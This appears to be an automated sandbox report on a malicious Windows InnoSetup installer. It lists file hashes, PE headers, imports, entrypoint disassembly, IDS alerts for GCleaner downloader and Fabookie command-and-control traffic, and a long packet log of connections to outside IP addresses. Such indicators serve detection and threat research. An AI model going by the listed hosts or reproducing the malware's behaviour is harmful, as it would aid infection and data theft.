                                        SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
                                        SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):73728
                                        Entropy (8bit):6.20389308045717
                                        Encrypted:false
                                        SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                                        MD5:3FB36CB0B7172E5298D2992D42984D06
                                        SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                                        SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                                        SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 50%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                                        Entropy (8bit):7.9318000564899
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.88%
                                        • Inno Setup installer (109748/4) 1.08%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:2094367
                                        MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
                                        SHA1:a109ebcf251a1e69923c60330994190e40ab466c
                                        SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
                                        SHA512:11f39030a9e5f5a095c85aa087fe949ed7e83e1a53a3df487baab09a38d5e744150a8d4e7b34eaec28678561861e640cb34231b893a7f38751f143d0ea1305d1
                                        SSDEEP:49152:XirWlOmsJ8sSNd3HEKBqd0yLaS1vNf+8UkqBx:XiClONJu3HEKBqd0yLaGFfvqH
                                        TLSH:9FA51232715472EEFCE369B0584F426D66236FB3A1A87E2E310A37365A61331F115F1A
                                        File Content Preview:MZP.....................@.......................Inno....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                        Icon Hash:b8ba6cc880e1f204
                                        Entrypoint:0x409820
                                        Entrypoint Section:CODE
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                        DLL Characteristics:
                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:1
                                        OS Version Minor:0
                                        File Version Major:1
                                        File Version Minor:0
                                        Subsystem Version Major:1
                                        Subsystem Version Minor:0
                                        Import Hash:e92b45c54aa05ec107d5ef90662e6b33
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFD4h
                                        push ebx
                                        push esi
                                        push edi
                                        xor eax, eax
                                        mov dword ptr [ebp-10h], eax
                                        mov dword ptr [ebp-1Ch], eax
                                        call 00007FC5F939961Bh
                                        call 00007FC5F939A8C6h
                                        call 00007FC5F939CAC9h
                                        call 00007FC5F939CB10h
                                        call 00007FC5F939F107h
                                        call 00007FC5F939F26Eh
                                        mov esi, 0040BDE0h
                                        xor eax, eax
                                        push ebp
                                        push 00409F05h
                                        push dword ptr fs:[eax]
                                        mov dword ptr fs:[eax], esp
                                        xor edx, edx
                                        push ebp
                                        push 00409EBBh
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        mov eax, dword ptr [0040B014h]
                                        call 00007FC5F939FC5Fh
                                        call 00007FC5F939F81Eh
                                        lea edx, dword ptr [ebp-10h]
                                        xor eax, eax
                                        call 00007FC5F939CF84h
                                        mov edx, dword ptr [ebp-10h]
                                        mov eax, 0040BDD4h
                                        call 00007FC5F93996C7h
                                        push 00000002h
                                        push 00000000h
                                        push 00000001h
                                        mov ecx, dword ptr [0040BDD4h]
                                        mov dl, 01h
                                        mov eax, 00407158h
                                        call 00007FC5F939D66Bh
                                        mov dword ptr [0040BDD8h], eax
                                        xor edx, edx
                                        push ebp
                                        push 00409E99h
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        lea edx, dword ptr [ebp-18h]
                                        mov eax, dword ptr [0040BDD8h]
                                        call 00007FC5F939D767h
                                        mov ebx, dword ptr [ebp-18h]
                                        mov edx, 00000030h
                                        mov eax, dword ptr [0040BDD8h]
                                        call 00007FC5F939D8A1h
                                        mov edx, esi
                                        mov ecx, 0000000Ch
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x8f0.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1f558.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x0.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        CODE0x10000x8f940x9000False0.6195203993055556data6.591638965772245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        DATA0xa0000x2480x400False0.306640625data2.7093261929320986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        BSS0xb0000xe640x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata0xc0000x8f00xa00False0.3953125data4.294209855544776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .tls0xd0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata0xe0000x180x200False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .reloc0xf0000x8840x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .rsrc0x100000x1f5580x1f600False0.37483659113545814data4.9335056025106585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x1039c0x51f3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                        RT_ICON0x155900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States
                                        RT_ICON0x25db80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States
                                        RT_ICON0x29fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                                        RT_ICON0x2c5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                                        RT_ICON0x2d6300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                                        RT_ICON0x2dfb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                                        RT_STRING0x2e4200x2f2data
                                        RT_STRING0x2e7140x30cdata
                                        RT_STRING0x2ea200x2cedata
                                        RT_STRING0x2ecf00x68data
                                        RT_STRING0x2ed580xb4data
                                        RT_STRING0x2ee0c0xaedata
                                        RT_GROUP_ICON0x2eebc0x68dataEnglishUnited States
                                        RT_VERSION0x2ef240x3a8dataEnglishUnited States
                                        RT_MANIFEST0x2f2cc0x289XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                        DLLImport
                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                        user32.dllMessageBoxA
                                        oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                        kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                        user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                        comctl32.dllInitCommonControls
                                        advapi32.dllAdjustTokenPrivileges
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response8049706107.182.129.235192.168.2.5
                                        192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462TCP2041920ET TROJAN GCleaner Downloader Activity M84970580192.168.2.545.139.105.171
                                        192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287TCP2852981ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)4970680192.168.2.5107.182.129.235
                                        192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610TCP2852980ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)4970680192.168.2.5107.182.129.235
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 5, 2023 08:47:09.771787882 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:09.799809933 CET804970545.139.105.171192.168.2.5
                                        Jan 5, 2023 08:47:09.799943924 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:09.800462008 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:09.827680111 CET804970545.139.105.171192.168.2.5
                                        Jan 5, 2023 08:47:09.836986065 CET804970545.139.105.171192.168.2.5
                                        Jan 5, 2023 08:47:09.837126970 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:09.897756100 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:09.924849987 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:09.925086021 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:09.925610065 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:09.952578068 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:09.952980042 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:09.953092098 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:09.990287066 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.017482042 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017687082 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017736912 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017781973 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017790079 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.017816067 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017849922 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017884970 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017935991 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.017944098 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.017982960 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.017983913 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.018007994 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.018030882 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.018032074 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.018080950 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.018090963 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.018136024 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045037031 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045104027 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045137882 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045152903 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045172930 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045201063 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045212984 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045250893 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045254946 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045298100 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045305014 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045345068 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045346975 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045392990 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045394897 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045439959 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045439959 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045488119 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045490026 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045533895 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045536995 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045581102 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045583010 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045628071 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045628071 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045677900 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045680046 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045723915 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045728922 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045772076 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045772076 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045819998 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045825005 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045865059 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045869112 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045916080 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045917034 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.045964003 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.045968056 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.046013117 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.072890043 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073029995 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073051929 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073117971 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073136091 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073177099 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073189974 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073235989 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073251963 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073295116 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073312998 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073354006 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073359966 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073417902 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073420048 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073477030 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073477030 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073535919 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073538065 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073592901 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073592901 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073649883 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073651075 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073707104 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073707104 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073762894 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073765039 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073822021 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073822021 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073880911 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073883057 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073937893 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.073940992 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.073998928 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074003935 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074055910 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074055910 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074120998 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074141026 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074198961 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074201107 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074255943 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074258089 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074311972 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074312925 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074368000 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074368954 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074425936 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074426889 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074491978 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074493885 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074548006 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074548960 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074605942 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074608088 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074661016 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074661970 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074733973 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074769974 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074827909 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074831009 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074883938 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074892044 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.074944019 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.074947119 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075001001 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075006008 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075064898 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075066090 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075122118 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075125933 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075181961 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075184107 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075237989 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075237989 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075295925 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075298071 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075352907 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.075354099 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.075409889 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.102828026 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.102950096 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.102956057 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.103014946 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.103024006 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.103070021 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.103070021 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:10.103127956 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:10.156533957 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:10.183954954 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:10.184079885 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:10.184628010 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:10.211810112 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:10.635227919 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:10.635335922 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:12.711500883 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:12.738816023 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:13.094685078 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:13.094835997 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:14.841079950 CET804970545.139.105.171192.168.2.5
                                        Jan 5, 2023 08:47:14.841185093 CET4970580192.168.2.545.139.105.171
                                        Jan 5, 2023 08:47:15.078236103 CET8049706107.182.129.235192.168.2.5
                                        Jan 5, 2023 08:47:15.078341961 CET4970680192.168.2.5107.182.129.235
                                        Jan 5, 2023 08:47:15.194849014 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:15.222347975 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:15.582741022 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:15.582932949 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:18.399646997 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:18.426881075 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:18.811140060 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:18.811424017 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:20.899158001 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:20.929702997 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:21.282871008 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:21.282958984 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:23.423401117 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:23.451078892 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:23.864329100 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:23.864563942 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:25.946579933 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:25.973993063 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:26.442823887 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:26.443020105 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:28.517307997 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:28.544837952 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:28.903182030 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:28.903363943 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:30.978315115 CET4970780192.168.2.5171.22.30.106
                                        Jan 5, 2023 08:47:31.005625010 CET8049707171.22.30.106192.168.2.5
                                        Jan 5, 2023 08:47:31.374718904 CET8049707171.22.30.106192.168.2.5
